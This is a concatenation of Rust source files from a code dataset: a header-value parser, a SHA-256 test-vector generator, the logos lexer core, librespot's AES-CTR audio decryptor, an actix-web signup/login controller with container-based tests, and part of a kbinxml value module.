                (CommaSeparatedIteratorState::PostAmbleForQuoted, ',') => {
                    (None, CommaSeparatedIteratorState::Default)
                }
                (current_state, _) => (None, current_state),
            };
            self.state = next_state;
            if let Some(next) = next {
                return next;
            }
        }
        // End of input: flush any element still being scanned (including an
        // unterminated quote), otherwise signal exhaustion.
        match self.state {
            CommaSeparatedIteratorState::Default
            | CommaSeparatedIteratorState::PostAmbleForQuoted => None,
            CommaSeparatedIteratorState::Quoted
            | CommaSeparatedIteratorState::QuotedPair
            | CommaSeparatedIteratorState::Token => {
                self.state = CommaSeparatedIteratorState::Default;
                Some(&self.target[self.s..])
            }
        }
    }
}
/// Flag tracking whether the previous character inside a quoted string
/// was a backslash.
enum EscapeState {
    Normal,
    Escaped,
}
/// If `x` opens with a double quote, return its unescaped quoted contents
/// (up to the matching unescaped close quote, ignoring any trailing text);
/// otherwise return `x` unchanged, borrowed.
fn maybe_quoted(x: &str) -> Cow<str> {
    let mut chars = x.chars();
    if chars.next() != Some('"') {
        return x.into();
    }
    let mut unescaped = String::with_capacity(x.len());
    let mut state = EscapeState::Normal;
    for c in chars {
        state = match (state, c) {
            // Unescaped closing quote terminates the value.
            (EscapeState::Normal, '"') => break,
            (EscapeState::Normal, '\\') => EscapeState::Escaped,
            // Ordinary character, or the character following a backslash.
            (EscapeState::Normal, _) | (EscapeState::Escaped, _) => {
                unescaped.push(c);
                EscapeState::Normal
            }
        };
    }
    unescaped.into()
}
/// Strip one pair of enclosing square brackets (IPv6 literal form), if both
/// are present; otherwise return `x` unchanged.
fn maybe_bracketed(x: &str) -> &str {
    let bytes = x.as_bytes();
    match (bytes.first(), bytes.last()) {
        (Some(b'['), Some(b']')) => &x[1..x.len() - 1],
        _ => x,
    }
}
/// Newtype around a parsed list so `FromStr` can be implemented for it.
struct CommaSeparated<T>(Vec<T>);
impl<T> CommaSeparated<T> {
    /// Unwrap into the underlying vector of parsed elements.
    pub fn into_inner(self) -> Vec<T> {
        let CommaSeparated(items) = self;
        items
    }
}
impl<T: FromStr> FromStr for CommaSeparated<T> {
    type Err = T::Err;
    /// Parse a comma-separated header value: each element is trimmed,
    /// unquoted and unbracketed before being handed to `T::from_str`.
    /// Fails with the first element's error if any element does not parse.
    fn from_str(s: &str) -> Result<Self, Self::Err> {
        let vec = CommaSeparatedIterator::new(s)
            .map(|x| T::from_str(maybe_bracketed(&maybe_quoted(x.trim()))))
            .collect::<Result<Vec<_>, _>>()?;
        Ok(CommaSeparated(vec))
    }
}
#[cfg(test)]
mod tests {
    use crate::{maybe_bracketed, maybe_quoted, CommaSeparatedIterator};
    /// Splitting honours whitespace trimming of starts and keeps quoted
    /// segments (including embedded commas) intact, quotes included.
    #[test]
    fn test_comma_separated_iterator() {
        assert_eq!(
            vec!["abc", "def", "ghi", "jkl ", "mno", "pqr"],
            CommaSeparatedIterator::new("abc,def, ghi,\tjkl , mno,\tpqr").collect::<Vec<&str>>()
        );
        assert_eq!(
            vec![
                "abc",
                "\"def\"",
                "\"ghi\"",
                "\"jkl\"",
                "\"mno\"",
                "pqr",
                "\"abc, def\"",
            ],
            CommaSeparatedIterator::new(
                "abc,\"def\", \"ghi\",\t\"jkl\" , \"mno\",\tpqr, \"abc, def\""
            )
            .collect::<Vec<&str>>()
        );
    }
    /// Unquoting strips the delimiters and unescapes backslash pairs.
    #[test]
    fn test_maybe_quoted() {
        assert_eq!("abc", maybe_quoted("abc"));
        assert_eq!("abc", maybe_quoted("\"abc\""));
        assert_eq!("a\"bc", maybe_quoted("\"a\\\"bc\""));
    }
    /// Brackets are only stripped when both ends are present.
    #[test]
    fn test_maybe_bracketed() {
        assert_eq!("abc", maybe_bracketed("abc"));
        assert_eq!("abc", maybe_bracketed("[abc]"));
        assert_eq!("[abc", maybe_bracketed("[abc"));
        assert_eq!("abc]", maybe_bracketed("abc]"));
    }
}
| true |
3999b71803bfe31daa051cd06351a5a1f95f5b38
|
Rust
|
kokeshiM0chi/BlockMaze
|
/libsnark-hdsnark/src/subgadget/gen_data/gen_sha256_two_block_data/main.rs
|
UTF-8
| 1,147 | 2.6875 | 3 |
[
"MIT"
] |
permissive
|
#![feature(rustc_private)]
extern crate rustc;
use rustc::util::sha2::{Digest,Sha256};
//use std::u8;
//use self::Test::*;
/// Entry point: print the hard-coded "valid" SHA-256 test-vector data.
fn main() {
    println!("valid: ");
    gen();
}
/// Build a fixed test vector — an 8-byte value `v` and 32-byte `sn`/`r` —
/// hash their concatenation with SHA-256, and print each buffer as a C++
/// `int_list_to_bits({...}, 8);` initializer line.
fn gen() {
    let v: Vec<u8> = vec![3, 0, 0, 0, 0, 0, 0, 0];
    let sn: Vec<u8> = vec![1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
    let r: Vec<u8> = vec![1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
    // h = SHA-256(v || sn || r)
    let h: Vec<u8> = {
        let mut hash = Sha256::new();
        hash.input(&v);
        hash.input(&sn);
        hash.input(&r);
        hash.result_bytes()
    };
    // Each line is `<name> = int_list_to_bits(` followed by `into_bin`'s
    // `{...}, 8);` suffix.
    print!("hash_bv = int_list_to_bits("); into_bin(&h);
    print!("v_data_bv = int_list_to_bits("); into_bin(&v);
    print!("sn_data_bv = int_list_to_bits("); into_bin(&sn);
    print!("r_data_bv = int_list_to_bits("); into_bin(&r);
}
/// Print `a` as `{b0, b1, ...}, 8);` followed by a newline — the tail of a
/// C++ `int_list_to_bits({...}, 8);` call.
///
/// Takes `&[u8]` instead of the original `&Vec<u8>`; existing `&vec`
/// call sites still work via deref coercion. The manual first-element
/// bookkeeping is replaced with `join`.
fn into_bin(a: &[u8]) {
    let body = a.iter().map(u8::to_string).collect::<Vec<_>>().join(", ");
    println!("{{{}}}, 8);", body);
}
| true |
2f5743d779ae38526bff2434a91a78666af5bfd3
|
Rust
|
mbrook22yr/logos
|
/logos/src/lexer.rs
|
UTF-8
| 5,022 | 3.3125 | 3 |
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
use std::ops::Range;
use crate::source::{Source, ByteArray};
use super::{Logos};
use super::internal::LexerInternal;
/// A Lookup Table used internally. It maps indices for every valid
/// byte to a function that takes a mutable reference to the `Lexer`,
/// reads the input and sets the correct token variant for it.
///
/// One entry per possible byte value; a `None` entry means the byte
/// cannot start a token and is treated as whitespace by `advance`.
pub type Lexicon<Lexer> = [Option<fn(&mut Lexer)>; 256];
/// `Lexer` is the main struct of the crate that allows you to read through a
/// `Source` and produce tokens for enums implementing the `Logos` trait.
pub struct Lexer<Token: Logos, Source> {
    /// Source from which the Lexer is reading tokens.
    pub source: Source,
    /// Current token. Call the `advance` method to get a new token.
    pub token: Token,
    /// Extras associated with the `Token`.
    pub extras: Token::Extras,
    // Byte offset in `source` where the current token starts.
    token_start: usize,
    // Byte offset in `source` one past the current token's end; also the
    // read cursor while scanning.
    token_end: usize,
}
// Expands `$code` four times back-to-back and then once more inside an
// infinite `loop`: a manual unroll of the first iterations of `advance`'s
// whitespace-skipping scan.
macro_rules! unroll {
    ($( $code:tt )*) => (
        $( $code )*
        $( $code )*
        $( $code )*
        $( $code )*
        loop {
            $( $code )*
        }
    )
}
impl<'source, Token, Source> Lexer<Token, Source>
where
    Token: self::Logos,
    Source: self::Source<'source>,
{
    /// Create a new `Lexer`.
    ///
    /// Due to type inference, it might be more ergonomic to construct
    /// it by calling `Token::lexer(source)`, where `Token` implements `Logos`.
    pub fn new(source: Source) -> Self {
        let mut lex = Lexer {
            source,
            token: Token::ERROR,
            extras: Default::default(),
            token_start: 0,
            token_end: 0,
        };
        // Prime the lexer so `token` holds the first real token (or ERROR)
        // immediately after construction.
        lex.advance();
        lex
    }
    /// Advance the `Lexer` and attempt to produce the next `Token`.
    pub fn advance(&mut self) {
        let mut ch;
        self.extras.on_advance();
        // Bytes with no handler in the lexicon are treated as whitespace:
        // notify `Extras` and keep scanning. The handler itself is
        // responsible for setting `self.token` and bumping `token_end`.
        unroll! {
            ch = self.read();
            if let Some(handler) = Token::lexicon()[ch as usize] {
                self.token_start = self.token_end;
                return handler(self);
            }
            self.extras.on_whitespace(ch);
            self.bump(1);
        }
    }
    /// Get the range for the current token in `Source`.
    #[inline]
    pub fn range(&self) -> Range<usize> {
        self.token_start .. self.token_end
    }
    /// Get a string slice of the current token.
    #[inline]
    pub fn slice(&self) -> Source::Slice {
        // SAFETY(review): relies on `range()` staying within the source
        // bounds, which `bump`'s debug assertion enforces in debug builds;
        // the `slice_unchecked` contract is defined by the `Source` trait.
        unsafe { self.source.slice_unchecked(self.range()) }
    }
}
/// Helper trait that can be injected into the `Lexer` to handle things that
/// aren't necessarily tokens, such as comments or Automatic Semicolon Insertion
/// in JavaScript.
///
/// Both hooks default to no-ops, so implementors override only what they need.
pub trait Extras: Sized + Default {
    /// Method called by the `Lexer` when a new token is about to be produced.
    #[inline]
    fn on_advance(&mut self) {}
    /// Method called by the `Lexer` when a white space byte has been encountered.
    #[inline]
    fn on_whitespace(&mut self, _byte: u8) {}
}
/// Default `Extras` with no logic
impl Extras for () { }
#[doc(hidden)]
/// # WARNING!
///
/// **This trait, and it's methods, are not meant to be used outside of the
/// code produced by `#[derive(Logos)]` macro.**
impl<'source, Token, Source> LexerInternal<'source> for Lexer<Token, Source>
where
    Token: self::Logos,
    Source: self::Source<'source>,
{
    /// Read a byte at current position of the `Lexer`. If end
    /// of the `Source` has been reached, this will return `0`.
    ///
    /// # WARNING!
    ///
    /// This should never be called as public API, and is instead
    /// meant to be called by the implementor of the `Logos` trait.
    #[inline]
    fn read(&self) -> u8 {
        // SAFETY(review): `Source::read` is documented above to return 0 at
        // the end of the source; confirm the trait impls uphold this.
        unsafe { self.source.read(self.token_end) }
    }
    // Read a fixed-size byte array starting at the cursor, or `None` if
    // there aren't enough bytes left.
    #[inline]
    fn read_bytes<Array>(&self) -> Option<&'source Array>
    where
        Array: ByteArray<'source>
    {
        self.source.read_bytes(self.token_end)
    }
    /// Convenience method that bumps the position `Lexer` is
    /// reading from and then reads the following byte.
    ///
    /// # WARNING!
    ///
    /// This should never be called as public API, and is instead
    /// meant to be called by the implementor of the `Logos` trait.
    ///
    /// **If the end position has been reached, further bumps
    /// can lead to undefined behavior!**
    ///
    /// **This method will panic in debug mode if that happens!**
    #[inline]
    fn next(&mut self) -> u8 {
        self.bump(1);
        self.read()
    }
    /// Bump the position `Lexer` is reading from by `1`.
    ///
    /// # WARNING!
    ///
    /// This should never be called as public API, and is instead
    /// meant to be called by the implementor of the `Logos` trait.
    ///
    /// **If the end position has been reached, further bumps
    /// can lead to undefined behavior!**
    ///
    /// **This method will panic in debug mode if that happens!**
    #[inline]
    fn bump(&mut self, size: usize) {
        // Out-of-bounds bumps are only caught in debug builds.
        debug_assert!(self.token_end + size <= self.source.len(), "Bumping out of bounds!");
        self.token_end += size;
    }
}
| true |
5633aec609cd0a4dfe0fe96e74a0afff8b6cdf30
|
Rust
|
librespot-org/librespot
|
/audio/src/decrypt.rs
|
UTF-8
| 1,424 | 2.515625 | 3 |
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
use std::io;
use aes::cipher::{KeyIvInit, StreamCipher, StreamCipherSeek};
type Aes128Ctr = ctr::Ctr128BE<aes::Aes128>;
use librespot_core::audio_key::AudioKey;
// Fixed AES-CTR initialization vector used for every cipher this module
// constructs; the per-file secret is the AES key alone. Keep the value
// verbatim — it must match what the service used when encrypting.
const AUDIO_AESIV: [u8; 16] = [
    0x72, 0xe0, 0x67, 0xfb, 0xdd, 0xcb, 0xcf, 0x77, 0xeb, 0xe8, 0xbc, 0x64, 0x3f, 0x63, 0x0d, 0x93,
];
/// `Read`/`Seek` adapter that transparently decrypts AES-128-CTR encrypted
/// audio data coming from the wrapped reader.
pub struct AudioDecrypt<T: io::Read> {
    // a `None` cipher is a convenience to make `AudioDecrypt` pass files unaltered
    cipher: Option<Aes128Ctr>,
    reader: T,
}
impl<T: io::Read> AudioDecrypt<T> {
    /// Wraps `reader`, decrypting with `key` when one is provided.
    ///
    /// With `key == None` (some files are unencrypted) — or when the key
    /// material has an unexpected length — data passes through unmodified.
    pub fn new(key: Option<AudioKey>, reader: T) -> AudioDecrypt<T> {
        let cipher = key.and_then(|key| Aes128Ctr::new_from_slices(&key.0, &AUDIO_AESIV).ok());
        AudioDecrypt { cipher, reader }
    }
}
impl<T: io::Read> io::Read for AudioDecrypt<T> {
    fn read(&mut self, output: &mut [u8]) -> io::Result<usize> {
        let len = self.reader.read(output)?;
        if let Some(ref mut cipher) = self.cipher {
            // Decrypt in place — only the bytes actually read this call.
            cipher.apply_keystream(&mut output[..len]);
        }
        Ok(len)
    }
}
impl<T: io::Read + io::Seek> io::Seek for AudioDecrypt<T> {
    fn seek(&mut self, pos: io::SeekFrom) -> io::Result<u64> {
        let newpos = self.reader.seek(pos)?;
        if let Some(ref mut cipher) = self.cipher {
            // Re-align the CTR keystream with the new byte offset so the
            // next `read` decrypts correctly after a seek.
            cipher.seek(newpos);
        }
        Ok(newpos)
    }
}
| true |
b8346deb7316b113c53448619cddcaf39a889e7b
|
Rust
|
SakaDream/actix-web-rest-api-with-jwt
|
/src/api/account_controller.rs
|
UTF-8
| 17,293 | 2.515625 | 3 |
[
"MIT"
] |
permissive
|
use actix_web::{web, HttpRequest, HttpResponse};
use crate::{
config::db::Pool,
constants,
error::ServiceError,
models::{
response::ResponseBody,
user::{LoginDTO, UserDTO},
},
services::account_service,
};
// POST api/auth/signup
//
// Registers a new user. Responds 200 with the service's success message, or
// propagates the `ServiceError` (e.g. duplicate user) to the error handler.
pub async fn signup(
    user_dto: web::Json<UserDTO>,
    pool: web::Data<Pool>,
) -> Result<HttpResponse, ServiceError> {
    // `map` replaces the original `match` whose `Err` arm merely re-wrapped
    // the error unchanged.
    account_service::signup(user_dto.0, &pool)
        .map(|message| HttpResponse::Ok().json(ResponseBody::new(&message, constants::EMPTY)))
}
// POST api/auth/login
//
// Authenticates by username or e-mail. Responds 200 with the token payload on
// success; otherwise propagates the service-layer `ServiceError`.
pub async fn login(
    login_dto: web::Json<LoginDTO>,
    pool: web::Data<Pool>,
) -> Result<HttpResponse, ServiceError> {
    // `map` replaces the original `match` whose `Err` arm merely re-wrapped
    // the error unchanged.
    account_service::login(login_dto.0, &pool).map(|token_res| {
        HttpResponse::Ok().json(ResponseBody::new(
            constants::MESSAGE_LOGIN_SUCCESS,
            token_res,
        ))
    })
}
// POST api/auth/logout
//
// Invalidates the caller's token. Requires the `Authorization` header; a
// request without it is rejected as a bad request.
pub async fn logout(req: HttpRequest, pool: web::Data<Pool>) -> Result<HttpResponse, ServiceError> {
    match req.headers().get(constants::AUTHORIZATION) {
        Some(authen_header) => {
            account_service::logout(authen_header, &pool);
            Ok(HttpResponse::Ok().json(ResponseBody::new(
                constants::MESSAGE_LOGOUT_SUCCESS,
                constants::EMPTY,
            )))
        }
        None => Err(ServiceError::BadRequest {
            error_message: constants::MESSAGE_TOKEN_MISSING.to_string(),
        }),
    }
}
// GET api/auth/me
//
// Returns the login info associated with the caller's token. Requires the
// `Authorization` header; a request without it is rejected as a bad request.
pub async fn me(req: HttpRequest, pool: web::Data<Pool>) -> Result<HttpResponse, ServiceError> {
    match req.headers().get(constants::AUTHORIZATION) {
        Some(authen_header) => account_service::me(authen_header, &pool).map(|login_info| {
            HttpResponse::Ok().json(ResponseBody::new(constants::MESSAGE_OK, login_info))
        }),
        None => Err(ServiceError::BadRequest {
            error_message: constants::MESSAGE_TOKEN_MISSING.to_string(),
        }),
    }
}
#[cfg(test)]
mod tests {
    use actix_cors::Cors;
    use actix_web::dev::Service;
    use actix_web::web;
    use actix_web::{http, http::StatusCode, test};
    use futures::FutureExt;
    use http::header;
    use testcontainers::clients;
    use testcontainers::images::postgres::Postgres;

    use crate::{config, App};

    /// Boots a throwaway Postgres container, runs the migrations, and builds
    /// the fully configured actix test service — previously copy-pasted ~35
    /// lines at the top of every test.
    ///
    /// A macro rather than a helper fn because (a) the container borrows the
    /// docker client, so both must live in the test's scope, and (b) the
    /// service type returned by `init_service` is unnameable.
    macro_rules! init_test_app {
        ($docker:ident, $app:ident) => {
            let $docker = clients::Cli::default();
            let postgres = $docker.run(Postgres::default());
            let pool = config::db::init_db_pool(
                format!(
                    "postgres://postgres:[email protected]:{}/postgres",
                    postgres.get_host_port_ipv4(5432)
                )
                .as_str(),
            );
            config::db::run_migration(&mut pool.get().unwrap());
            let $app = test::init_service(
                App::new()
                    .wrap(
                        Cors::default()
                            .send_wildcard()
                            .allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
                            .allowed_header(http::header::CONTENT_TYPE)
                            .max_age(3600),
                    )
                    .app_data(web::Data::new(pool.clone()))
                    .wrap(actix_web::middleware::Logger::default())
                    .wrap(crate::middleware::auth_middleware::Authentication)
                    .wrap_fn(|req, srv| srv.call(req).map(|res| res))
                    .configure(crate::config::app::config_services),
            )
            .await;
        };
    }

    /// POSTs a JSON payload to the given endpoint and yields the response.
    macro_rules! post_json {
        ($app:expr, $uri:expr, $payload:expr) => {
            test::TestRequest::post()
                .uri($uri)
                .insert_header(header::ContentType::json())
                .set_payload($payload.as_bytes())
                .send_request(&$app)
                .await
        };
    }

    // Shared signup payload used by most tests.
    const SIGNUP_ADMIN: &str =
        r#"{"username":"admin","email":"[email protected]","password":"123456"}"#;

    #[actix_web::test]
    async fn test_signup_ok() {
        init_test_app!(_docker, app);
        let resp = post_json!(app, "/api/auth/signup", SIGNUP_ADMIN);
        assert_eq!(resp.status(), StatusCode::OK);
    }

    #[actix_web::test]
    async fn test_signup_duplicate_user() {
        init_test_app!(_docker, app);
        post_json!(app, "/api/auth/signup", SIGNUP_ADMIN);
        // A second registration with the same credentials must be rejected.
        let resp = post_json!(app, "/api/auth/signup", SIGNUP_ADMIN);
        assert_eq!(resp.status(), StatusCode::BAD_REQUEST);
    }

    #[actix_web::test]
    async fn test_login_ok_with_username() {
        init_test_app!(_docker, app);
        post_json!(app, "/api/auth/signup", SIGNUP_ADMIN);
        let resp = post_json!(
            app,
            "/api/auth/login",
            r#"{"username_or_email":"admin","password":"123456"}"#
        );
        assert_eq!(resp.status(), StatusCode::OK);
    }

    #[actix_web::test]
    async fn test_login_ok_with_email() {
        init_test_app!(_docker, app);
        post_json!(app, "/api/auth/signup", SIGNUP_ADMIN);
        let resp = post_json!(
            app,
            "/api/auth/login",
            r#"{"username_or_email":"[email protected]","password":"123456"}"#
        );
        assert_eq!(resp.status(), StatusCode::OK);
    }

    #[actix_web::test]
    async fn test_login_password_incorrect_with_username() {
        init_test_app!(_docker, app);
        post_json!(app, "/api/auth/signup", SIGNUP_ADMIN);
        let resp = post_json!(
            app,
            "/api/auth/login",
            r#"{"username_or_email":"admin","password":"password"}"#
        );
        assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
    }

    #[actix_web::test]
    async fn test_login_password_incorrect_with_email() {
        init_test_app!(_docker, app);
        post_json!(app, "/api/auth/signup", SIGNUP_ADMIN);
        let resp = post_json!(
            app,
            "/api/auth/login",
            r#"{"username_or_email":"[email protected]","password":"password"}"#
        );
        assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
    }

    #[actix_web::test]
    async fn test_login_user_not_found_with_username() {
        init_test_app!(_docker, app);
        // Note: this account's password is "password" (as in the original test).
        post_json!(
            app,
            "/api/auth/signup",
            r#"{"username":"admin","email":"[email protected]","password":"password"}"#
        );
        let resp = post_json!(
            app,
            "/api/auth/login",
            r#"{"username_or_email":"abc","password":"123456"}"#
        );
        assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
    }

    #[actix_web::test]
    async fn test_login_user_not_found_with_email() {
        init_test_app!(_docker, app);
        post_json!(
            app,
            "/api/auth/signup",
            r#"{"username":"admin","email":"[email protected]","password":"password"}"#
        );
        let resp = post_json!(
            app,
            "/api/auth/login",
            r#"{"username_or_email":"[email protected]","password":"123456"}"#
        );
        assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
    }
}
| true |
67599042cbcb143251aea523b3da9633ca194b96
|
Rust
|
mbilker/kbinxml-rs
|
/kbinxml/src/value/mod.rs
|
UTF-8
| 22,862 | 2.515625 | 3 |
[
"MIT"
] |
permissive
|
use std::borrow::Cow;
use std::convert::TryFrom;
use std::fmt;
use std::io::Cursor;
use std::net::Ipv4Addr;
use rustc_hex::FromHex;
use snafu::ResultExt;
use crate::error::{HexSnafu, KbinError, Result};
use crate::node_types::StandardType;
use crate::types::{FromKbinBytes, FromKbinString, IntoKbinBytes};
mod array;
pub use self::array::ValueArray;
/// Declares the `Value` enum and, for every listed `(Variant, Type)` pair:
/// `From<Type> for Value`, plus fallible `TryFrom<Value>` / `TryFrom<&Value>`
/// back to the type, and the `standard_type` mapping. `Binary`, `Time`,
/// `Attribute` and `Array` are declared by hand because their conversions are
/// irregular (see the explicit impls later in this module).
macro_rules! construct_types {
  (
    $(
      ($konst:ident, $($value_type:tt)*);
    )+
  ) => {
    #[derive(Clone, PartialEq)]
    pub enum Value {
      $(
        $konst($($value_type)*),
      )+
      Binary(Vec<u8>),
      Time(u32),
      Attribute(String),
      Array(ValueArray),
    }
    $(
      impl From<$($value_type)*> for Value {
        fn from(value: $($value_type)*) -> Value {
          Value::$konst(value)
        }
      }
      impl TryFrom<Value> for $($value_type)* {
        type Error = KbinError;
        fn try_from(value: Value) -> Result<Self> {
          match value {
            Value::$konst(v) => Ok(v),
            value => {
              Err(KbinError::ValueTypeMismatch {
                node_type: StandardType::$konst,
                value,
              })
            },
          }
        }
      }
      impl TryFrom<&Value> for $($value_type)* {
        type Error = KbinError;
        fn try_from(value: &Value) -> Result<Self> {
          match value {
            // Borrowed conversion must clone the payload out.
            Value::$konst(ref v) => Ok(v.clone()),
            value => {
              Err(KbinError::ValueTypeMismatch {
                node_type: StandardType::$konst,
                value: value.clone(),
              })
            },
          }
        }
      }
    )+
    impl Value {
      /// Maps each variant back to its kbin node type descriptor.
      pub fn standard_type(&self) -> StandardType {
        match *self {
          $(
            Value::$konst(_) => StandardType::$konst,
          )+
          Value::Binary(_) => StandardType::Binary,
          Value::Time(_) => StandardType::Time,
          Value::Attribute(_) => StandardType::Attribute,
          Value::Array(ref value) => value.standard_type(),
        }
      }
    }
  }
}
/// Generates the tuple-variant arms shared by `Value::from_standard_type`,
/// `Value::from_string` and `Value::to_bytes_inner`; the scalar variants are
/// written out explicitly inside each function.
macro_rules! tuple {
  (
    $($konst:ident),*$(,)?
  ) => {
    /// Decodes `input` into a `Value` for the given kbin node type.
    /// Returns `Ok(None)` for node types that carry no binary payload here
    /// (structure markers, strings, attributes).
    pub fn from_standard_type(
      node_type: StandardType,
      is_array: bool,
      input: &[u8],
    ) -> Result<Option<Value>> {
      let node_size = node_type.size * node_type.count;
      if is_array {
        let value = match ValueArray::from_standard_type(node_type, input)? {
          Some(value) => value,
          None => return Err(KbinError::InvalidState),
        };
        debug!(
          "Value::from_standard_type({:?}) input: 0x{:02x?} => {:?}",
          node_type, input, value
        );
        return Ok(Some(Value::Array(value)));
      }
      // Fixed-size types must match exactly; `String`/`Binary` are
      // variable-length and skip the size check.
      match node_type {
        StandardType::String | StandardType::Binary => {},
        _ => {
          if input.len() != node_size {
            return Err(KbinError::SizeMismatch {
              node_type: node_type.name,
              expected: node_size,
              actual: input.len(),
            });
          }
        },
      };
      let mut reader = Cursor::new(input);
      let value = match node_type {
        StandardType::NodeStart |
        StandardType::NodeEnd |
        StandardType::FileEnd |
        StandardType::Attribute |
        StandardType::String => return Ok(None),
        StandardType::S8 => i8::from_kbin_bytes(&mut reader).map(Value::S8)?,
        StandardType::U8 => u8::from_kbin_bytes(&mut reader).map(Value::U8)?,
        StandardType::S16 => i16::from_kbin_bytes(&mut reader).map(Value::S16)?,
        StandardType::U16 => u16::from_kbin_bytes(&mut reader).map(Value::U16)?,
        StandardType::S32 => i32::from_kbin_bytes(&mut reader).map(Value::S32)?,
        StandardType::U32 => u32::from_kbin_bytes(&mut reader).map(Value::U32)?,
        StandardType::S64 => i64::from_kbin_bytes(&mut reader).map(Value::S64)?,
        StandardType::U64 => u64::from_kbin_bytes(&mut reader).map(Value::U64)?,
        StandardType::Binary => Value::Binary(input.to_vec()),
        StandardType::Time => u32::from_kbin_bytes(&mut reader).map(Value::Time)?,
        StandardType::Ip4 => Ipv4Addr::from_kbin_bytes(&mut reader).map(Value::Ip4)?,
        StandardType::Float => f32::from_kbin_bytes(&mut reader).map(Value::Float)?,
        StandardType::Double => f64::from_kbin_bytes(&mut reader).map(Value::Double)?,
        StandardType::Boolean => bool::from_kbin_bytes(&mut reader).map(Value::Boolean)?,
        $(
          StandardType::$konst => {
            FromKbinBytes::from_kbin_bytes(&mut reader).map(Value::$konst)?
          },
        )*
      };
      debug!("Value::from_standard_type({:?}) input: 0x{:02x?} => {:?}", node_type, input, value);
      Ok(Some(value))
    }
    /// Parses the textual (XML) representation of a value for the given
    /// node type; `arr_count` is only meaningful when `is_array` is set.
    pub fn from_string(
      node_type: StandardType,
      input: &str,
      is_array: bool,
      arr_count: usize,
    ) -> Result<Value> {
      trace!(
        "Value::from_string({:?}, is_array: {}, arr_count: {}) => input: {:?}",
        node_type,
        is_array,
        arr_count,
        input
      );
      if is_array {
        // A node type with `count == 0` cannot form an array.
        let value = match node_type.count {
          0 => return Err(KbinError::InvalidState.into()),
          count => Value::Array(ValueArray::from_string(node_type, count, input, arr_count)?),
        };
        debug!("Value::from_string({:?}) input: {:?} => {:?}", node_type, input, value);
        return Ok(value);
      }
      let value = match node_type {
        StandardType::NodeStart |
        StandardType::NodeEnd |
        StandardType::FileEnd => return Err(KbinError::InvalidNodeType { node_type }),
        StandardType::S8 => i8::from_kbin_string(input).map(Value::S8)?,
        StandardType::U8 => u8::from_kbin_string(input).map(Value::U8)?,
        StandardType::S16 => i16::from_kbin_string(input).map(Value::S16)?,
        StandardType::U16 => u16::from_kbin_string(input).map(Value::U16)?,
        StandardType::S32 => i32::from_kbin_string(input).map(Value::S32)?,
        StandardType::U32 => u32::from_kbin_string(input).map(Value::U32)?,
        StandardType::S64 => i64::from_kbin_string(input).map(Value::S64)?,
        StandardType::U64 => u64::from_kbin_string(input).map(Value::U64)?,
        StandardType::Binary => input.from_hex().map(Value::Binary).context(HexSnafu)?,
        StandardType::String => Value::String(input.to_owned()),
        StandardType::Attribute => Value::Attribute(input.to_owned()),
        StandardType::Ip4 => Ipv4Addr::from_kbin_string(input).map(Value::Ip4)?,
        StandardType::Time => u32::from_kbin_string(input).map(Value::Time)?,
        StandardType::Float => f32::from_kbin_string(input).map(Value::Float)?,
        StandardType::Double => f64::from_kbin_string(input).map(Value::Double)?,
        StandardType::Boolean => bool::from_kbin_string(input).map(Value::Boolean)?,
        $(
          StandardType::$konst => FromKbinString::from_kbin_string(input)
            .map(Value::$konst)?,
        )*
      };
      debug!("Value::from_string({:?}) input: {:?} => {:?}", node_type, input, value);
      Ok(value)
    }
    /// Serializes this value into `output`. `String`/`Attribute` are
    /// rejected here because their encoding is handled elsewhere.
    fn to_bytes_inner(&self, output: &mut Vec<u8>) -> Result<()> {
      debug!("Value::to_bytes_inner(self: {:?})", self);
      match self {
        Value::S8(n) => n.write_kbin_bytes(output),
        Value::U8(n) => n.write_kbin_bytes(output),
        Value::S16(n) => n.write_kbin_bytes(output),
        Value::U16(n) => n.write_kbin_bytes(output),
        Value::S32(n) => n.write_kbin_bytes(output),
        Value::U32(n) => n.write_kbin_bytes(output),
        Value::S64(n) => n.write_kbin_bytes(output),
        Value::U64(n) => n.write_kbin_bytes(output),
        Value::Binary(data) => output.extend_from_slice(data),
        Value::Time(n) => n.write_kbin_bytes(output),
        Value::Ip4(addr) => addr.write_kbin_bytes(output),
        Value::Float(n) => n.write_kbin_bytes(output),
        Value::Double(n) => n.write_kbin_bytes(output),
        Value::Boolean(v) => v.write_kbin_bytes(output),
        Value::Array(value) => value.to_bytes_into(output)?,
        Value::Attribute(_) |
        Value::String(_) => {
          return Err(KbinError::InvalidNodeType { node_type: self.standard_type() });
        },
        $(
          Value::$konst(value) => {
            // Pre-reserve the exact encoded size for tuple variants.
            output.reserve(value.len() * StandardType::$konst.size);
            value.write_kbin_bytes(output);
          },
        )*
      };
      Ok(())
    }
  };
}
impl Value {
tuple! {
S8_2, S8_3, S8_4, Vs8,
U8_2, U8_3, U8_4, Vu8,
Boolean2, Boolean3, Boolean4, Vb,
S16_2, S16_3, S16_4, Vs16,
S32_2, S32_3, S32_4,
S64_2, S64_3, S64_4,
U16_2, U16_3, U16_4, Vu16,
U32_2, U32_3, U32_4,
U64_2, U64_3, U64_4,
Float2, Float3, Float4,
Double2, Double3, Double4,
}
pub fn to_bytes(&self) -> Result<Vec<u8>> {
let mut output = Vec::new();
self.to_bytes_inner(&mut output)?;
Ok(output)
}
#[inline]
pub fn to_bytes_into(&self, output: &mut Vec<u8>) -> Result<()> {
self.to_bytes_inner(output)
}
pub fn as_i8(&self) -> Result<i8> {
match self {
Value::S8(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::S8,
value: value.clone(),
}),
}
}
pub fn as_u8(&self) -> Result<u8> {
match self {
Value::U8(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U8,
value: value.clone(),
}),
}
}
pub fn as_i16(&self) -> Result<i16> {
match self {
Value::S16(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
